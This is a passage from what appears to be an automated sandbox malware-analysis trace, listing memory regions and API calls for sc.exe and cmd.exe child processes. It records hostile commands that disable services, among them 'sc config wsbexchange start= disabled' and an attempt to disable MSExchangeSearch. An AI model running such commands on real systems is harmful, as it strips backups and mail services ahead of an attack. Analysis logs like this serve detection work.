[0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8590 start_va = 0x5d0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 8591 start_va = 0x5f0000 end_va = 0x5f1fff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 8592 start_va = 0x600000 end_va = 0x613fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 8593 start_va = 0x620000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 8594 start_va = 0x660000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 8595 start_va = 0x6a0000 end_va = 0x6a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 8596 start_va = 0x6b0000 end_va = 0x6b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 8597 start_va = 0x6c0000 end_va = 0x6c1fff entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 8598 start_va = 0xe80000 end_va = 0xe91fff entry_point = 0xe80000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 8599 start_va = 0xea0000 end_va = 0x4e9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 8600 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8601 start_va = 0x7e840000 end_va = 0x7e862fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e840000" filename = "" Region: id = 8602 start_va = 0x7e867000 end_va = 0x7e867fff entry_point = 0x0 region_type = private name = "private_0x000000007e867000" filename = "" Region: id = 8603 start_va = 0x7e86b000 end_va = 0x7e86dfff entry_point = 0x0 region_type = private name = "private_0x000000007e86b000" filename = "" Region: id = 8604 start_va = 0x7e86e000 end_va = 0x7e86efff entry_point = 0x0 region_type = private name = "private_0x000000007e86e000" filename = "" Region: id = 8605 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8606 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8607 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 8608 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8609 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 8610 start_va = 0x7a0000 end_va = 0x7affff entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 8611 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8612 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8613 start_va = 0x840000 end_va = 0x93ffff entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 8614 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8615 start_va = 0x5d0000 end_va = 0x5dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 8616 start_va = 0x5e0000 end_va = 0x5e3fff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 8617 start_va = 0x6d0000 end_va = 0x78dfff entry_point = 0x6d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8618 start_va = 0x7b0000 end_va = 0x7effff entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 8619 start_va = 0x7f0000 end_va = 0x82ffff entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 8620 start_va = 0xa10000 end_va = 0xa1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 8621 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 8622 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 8623 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 8624 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8625 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 8626 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8627 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8628 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 8629 start_va = 0x7e740000 end_va = 0x7e83ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e740000" filename = "" Region: id = 8630 start_va = 0x7e868000 end_va = 0x7e86afff entry_point = 0x0 region_type = private name = "private_0x000000007e868000" filename = "" Region: id = 8631 start_va = 0xa20000 end_va = 0xafefff entry_point = 0xa20000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 8632 start_va = 0x940000 end_va = 0x951fff entry_point = 0x940000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 535 os_tid = 0x2d0 [0133.051] GetModuleHandleA (lpModuleName=0x0) returned 0xe80000 [0133.051] __set_app_type (_Type=0x1) [0133.051] __p__fmode () returned 0x77ac4d6c [0133.051] __p__commode () returned 0x77ac5b1c [0133.051] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe85e00) returned 0x0 [0133.051] __wgetmainargs (in: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030, _DoWildCard=0, _StartInfo=0xe8d03c | out: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030) returned 0 [0133.051] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.054] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0133.054] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0133.054] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0133.054] _wcsicmp (_String1="config", _String2="query") returned -14 [0133.054] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0133.054] _wcsicmp (_String1="config", _String2="start") returned -16 [0133.054] _wcsicmp (_String1="config", _String2="pause") returned -13 [0133.054] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0133.054] _wcsicmp (_String1="config", _String2="control") returned -14 [0133.054] _wcsicmp (_String1="config", _String2="continue") returned -14 [0133.054] _wcsicmp (_String1="config", _String2="stop") returned -16 [0133.054] _wcsicmp (_String1="config", _String2="config") returned 0 [0133.054] ResolveDelayLoadedAPI () returned 0x77262c10 [0133.054] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x848cd8 [0133.056] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0133.056] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0133.056] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0133.056] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0133.056] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0133.056] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0133.056] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0133.056] OpenServiceW (hSCManager=0x848cd8, lpServiceName="MSExchangeSearch", dwDesiredAccess=0x3) returned 0x0 [0133.056] GetLastError () returned 0x424 [0133.056] _ultow (in: _Dest=0x424, _Radix=6945828 | out: _Dest=0x424) returned="1060" [0133.056] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0xe8d3a0, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0133.057] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x69fc00, nSize=0x2, Arguments=0x69fc18 | out: lpBuffer="鐨\x84ﱀi蔔è") returned 0x62 [0133.058] GetFileType (hFile=0x3c) returned 0x2 [0133.058] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x69fbe4 | out: lpMode=0x69fbe4) returned 1 [0133.058] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x849428*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x69fbf4, lpReserved=0x0 | out: lpBuffer=0x849428*, lpNumberOfCharsWritten=0x69fbf4*=0x62) returned 1 [0133.058] LocalFree (hMem=0x849428) returned 0x0 [0133.058] LocalFree (hMem=0x0) returned 0x0 [0133.058] CloseServiceHandle (hSCObject=0x848cd8) returned 1 [0133.059] LocalFree (hMem=0x0) returned 0x0 [0133.059] exit (_Code=1060) Thread: id = 536 os_tid = 0xbc0 Process: id = "164" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0xfd43000" os_pid = "0xc7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c sc config wsbexchange start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8633 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 8634 start_va = 0xb00000 end_va = 0x4afffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b00000" filename = "" Region: id = 8635 start_va = 0x4b00000 end_va = 0x4b1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b00000" filename = "" Region: id = 8636 start_va = 0x4b20000 end_va = 0x4b20fff entry_point = 0x0 region_type = private name = "private_0x0000000004b20000" filename = "" Region: id = 8637 start_va = 0x4b30000 end_va = 0x4b43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b30000" filename = "" Region: id = 8638 start_va = 0x4b50000 end_va = 0x4b8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b50000" filename = "" Region: id = 8639 start_va = 0x4b90000 end_va = 0x4c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b90000" filename = "" Region: id = 8640 start_va = 0x4c90000 end_va = 0x4c93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c90000" filename = "" Region: id = 8641 start_va = 0x4ca0000 end_va = 0x4ca0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ca0000" filename = "" Region: id = 8642 start_va = 0x4cb0000 end_va = 0x4cb1fff entry_point = 0x0 region_type = private name = "private_0x0000000004cb0000" filename = "" Region: id = 8643 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8644 start_va = 0x7f080000 end_va = 0x7f0a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f080000" filename = "" Region: id = 8645 start_va = 0x7f0a6000 end_va = 0x7f0a6fff entry_point = 0x0 region_type = private name = "private_0x000000007f0a6000" filename = "" Region: id = 8646 start_va = 0x7f0ab000 end_va = 0x7f0abfff entry_point = 0x0 region_type = private name = "private_0x000000007f0ab000" filename = "" Region: id = 8647 start_va = 0x7f0ad000 end_va = 0x7f0affff entry_point = 0x0 region_type = private name = "private_0x000000007f0ad000" filename = "" Region: id = 8648 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8649 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8650 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 8651 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8652 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 8653 start_va = 0x4d80000 end_va = 0x4d8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d80000" filename = "" Region: id = 8654 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8655 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8656 start_va = 0x4f60000 end_va = 0x505ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f60000" filename = "" Region: id = 8657 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8698 start_va = 0x4b00000 end_va = 0x4b0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b00000" filename = "" Region: id = 8699 start_va = 0x4cc0000 end_va = 0x4d7dfff entry_point = 0x4cc0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8700 start_va = 0x4d90000 end_va = 0x4dcffff entry_point = 0x0 region_type = private name = "private_0x0000000004d90000" filename = "" Region: id = 8701 start_va = 0x4dd0000 end_va = 0x4ecffff entry_point = 0x0 region_type = private name = "private_0x0000000004dd0000" filename = "" Region: id = 8702 start_va = 0x5180000 end_va = 0x518ffff entry_point = 0x0 region_type = private name = "private_0x0000000005180000" filename = "" Region: id = 8703 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8704 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8705 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8706 start_va = 0x7ef80000 end_va = 0x7f07ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ef80000" filename = "" Region: id = 8707 start_va = 0x7f0a8000 end_va = 0x7f0aafff entry_point = 0x0 region_type = private name = "private_0x000000007f0a8000" filename = "" Region: id = 8708 start_va = 0x4b10000 end_va = 0x4b13fff entry_point = 0x0 region_type = private name = "private_0x0000000004b10000" filename = "" Region: id = 8709 start_va = 0x4b20000 end_va = 0x4b23fff entry_point = 0x0 region_type = private name = "private_0x0000000004b20000" filename = "" Region: id = 8710 start_va = 0x5190000 end_va = 0x54c6fff entry_point = 0x5190000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 537 os_tid = 0xc2c [0133.214] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0133.214] __set_app_type (_Type=0x1) [0133.214] __p__fmode () returned 0x77ac4d6c [0133.214] __p__commode () returned 0x77ac5b1c [0133.214] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0133.214] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0133.215] GetCurrentThreadId () returned 0xc2c [0133.215] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc2c) returned 0x84 [0133.215] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0133.215] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0133.215] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.217] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0133.217] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4c8fc0c | out: phkResult=0x4c8fc0c*=0x0) returned 0x2 [0133.217] VirtualQuery (in: lpAddress=0x4c8fc13, lpBuffer=0x4c8fbc4, dwLength=0x1c | out: lpBuffer=0x4c8fbc4*(BaseAddress=0x4c8f000, AllocationBase=0x4b90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0133.217] VirtualQuery (in: lpAddress=0x4b90000, lpBuffer=0x4c8fbc4, dwLength=0x1c | out: lpBuffer=0x4c8fbc4*(BaseAddress=0x4b90000, AllocationBase=0x4b90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0133.217] VirtualQuery (in: lpAddress=0x4b91000, lpBuffer=0x4c8fbc4, dwLength=0x1c | out: lpBuffer=0x4c8fbc4*(BaseAddress=0x4b91000, AllocationBase=0x4b90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0133.217] VirtualQuery (in: lpAddress=0x4b93000, lpBuffer=0x4c8fbc4, dwLength=0x1c | out: lpBuffer=0x4c8fbc4*(BaseAddress=0x4b93000, AllocationBase=0x4b90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0133.217] VirtualQuery (in: lpAddress=0x4c90000, lpBuffer=0x4c8fbc4, dwLength=0x1c | out: lpBuffer=0x4c8fbc4*(BaseAddress=0x4c90000, AllocationBase=0x4c90000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0133.217] GetConsoleOutputCP () returned 0x1b5 [0133.218] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0133.218] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0133.218] _get_osfhandle (_FileHandle=1) returned 0x3c [0133.218] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0133.218] _get_osfhandle (_FileHandle=1) returned 0x3c [0133.218] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0133.218] _get_osfhandle (_FileHandle=1) returned 0x3c [0133.218] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0133.218] _get_osfhandle (_FileHandle=0) returned 0x38 [0133.218] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0133.219] _get_osfhandle (_FileHandle=0) returned 0x38 [0133.219] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0133.219] GetEnvironmentStringsW () returned 0x4f67d90* [0133.219] FreeEnvironmentStringsA (penv="A") returned 1 [0133.219] GetEnvironmentStringsW () returned 0x4f67d90* [0133.219] FreeEnvironmentStringsA (penv="A") returned 1 [0133.219] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4c8eb70 | out: phkResult=0x4c8eb70*=0x94) returned 0x0 [0133.219] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4c8eb74, lpData=0x4c8eb7c, lpcbData=0x4c8eb78*=0x1000 | out: lpType=0x4c8eb74*=0x0, lpData=0x4c8eb7c*=0xb8, lpcbData=0x4c8eb78*=0x1000) returned 0x2 [0133.219] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4c8eb74, lpData=0x4c8eb7c, lpcbData=0x4c8eb78*=0x1000 | out: lpType=0x4c8eb74*=0x4, lpData=0x4c8eb7c*=0x1, lpcbData=0x4c8eb78*=0x4) returned 0x0 [0133.219] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4c8eb74, lpData=0x4c8eb7c, lpcbData=0x4c8eb78*=0x1000 | out: lpType=0x4c8eb74*=0x0, lpData=0x4c8eb7c*=0x1, lpcbData=0x4c8eb78*=0x1000) returned 0x2 [0133.219] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4c8eb74, lpData=0x4c8eb7c, lpcbData=0x4c8eb78*=0x1000 | out: lpType=0x4c8eb74*=0x4, lpData=0x4c8eb7c*=0x0, lpcbData=0x4c8eb78*=0x4) returned 0x0 [0133.219] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4c8eb74, lpData=0x4c8eb7c, lpcbData=0x4c8eb78*=0x1000 | out: lpType=0x4c8eb74*=0x4, lpData=0x4c8eb7c*=0x40, lpcbData=0x4c8eb78*=0x4) returned 0x0 [0133.219] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4c8eb74, lpData=0x4c8eb7c, lpcbData=0x4c8eb78*=0x1000 | out: lpType=0x4c8eb74*=0x4, lpData=0x4c8eb7c*=0x40, lpcbData=0x4c8eb78*=0x4) returned 0x0 [0133.219] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4c8eb74, lpData=0x4c8eb7c, lpcbData=0x4c8eb78*=0x1000 | out: lpType=0x4c8eb74*=0x0, lpData=0x4c8eb7c*=0x40, lpcbData=0x4c8eb78*=0x1000) returned 0x2 [0133.219] RegCloseKey (hKey=0x94) returned 0x0 [0133.219] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4c8eb70 | out: phkResult=0x4c8eb70*=0x94) returned 0x0 [0133.219] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4c8eb74, lpData=0x4c8eb7c, lpcbData=0x4c8eb78*=0x1000 | out: lpType=0x4c8eb74*=0x0, lpData=0x4c8eb7c*=0x40, lpcbData=0x4c8eb78*=0x1000) returned 0x2 [0133.219] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4c8eb74, lpData=0x4c8eb7c, lpcbData=0x4c8eb78*=0x1000 | out: lpType=0x4c8eb74*=0x4, lpData=0x4c8eb7c*=0x1, lpcbData=0x4c8eb78*=0x4) returned 0x0 [0133.220] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4c8eb74, lpData=0x4c8eb7c, lpcbData=0x4c8eb78*=0x1000 | out: lpType=0x4c8eb74*=0x0, lpData=0x4c8eb7c*=0x1, lpcbData=0x4c8eb78*=0x1000) returned 0x2 [0133.220] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4c8eb74, lpData=0x4c8eb7c, lpcbData=0x4c8eb78*=0x1000 | out: lpType=0x4c8eb74*=0x4, lpData=0x4c8eb7c*=0x0, lpcbData=0x4c8eb78*=0x4) returned 0x0 [0133.220] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4c8eb74, lpData=0x4c8eb7c, lpcbData=0x4c8eb78*=0x1000 | out: lpType=0x4c8eb74*=0x4, lpData=0x4c8eb7c*=0x9, lpcbData=0x4c8eb78*=0x4) returned 0x0 [0133.220] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4c8eb74, lpData=0x4c8eb7c, lpcbData=0x4c8eb78*=0x1000 | out: lpType=0x4c8eb74*=0x4, lpData=0x4c8eb7c*=0x9, lpcbData=0x4c8eb78*=0x4) returned 0x0 [0133.220] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4c8eb74, lpData=0x4c8eb7c, lpcbData=0x4c8eb78*=0x1000 | out: lpType=0x4c8eb74*=0x0, lpData=0x4c8eb7c*=0x9, lpcbData=0x4c8eb78*=0x1000) returned 0x2 [0133.220] RegCloseKey (hKey=0x94) returned 0x0 [0133.220] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29836 [0133.220] srand (_Seed=0x5ad29836) [0133.220] GetCommandLineW () returned="/c sc config wsbexchange start= disabled" [0133.220] GetCommandLineW () returned="/c sc config wsbexchange start= disabled" [0133.220] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0133.220] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4f69ce8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0133.220] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: 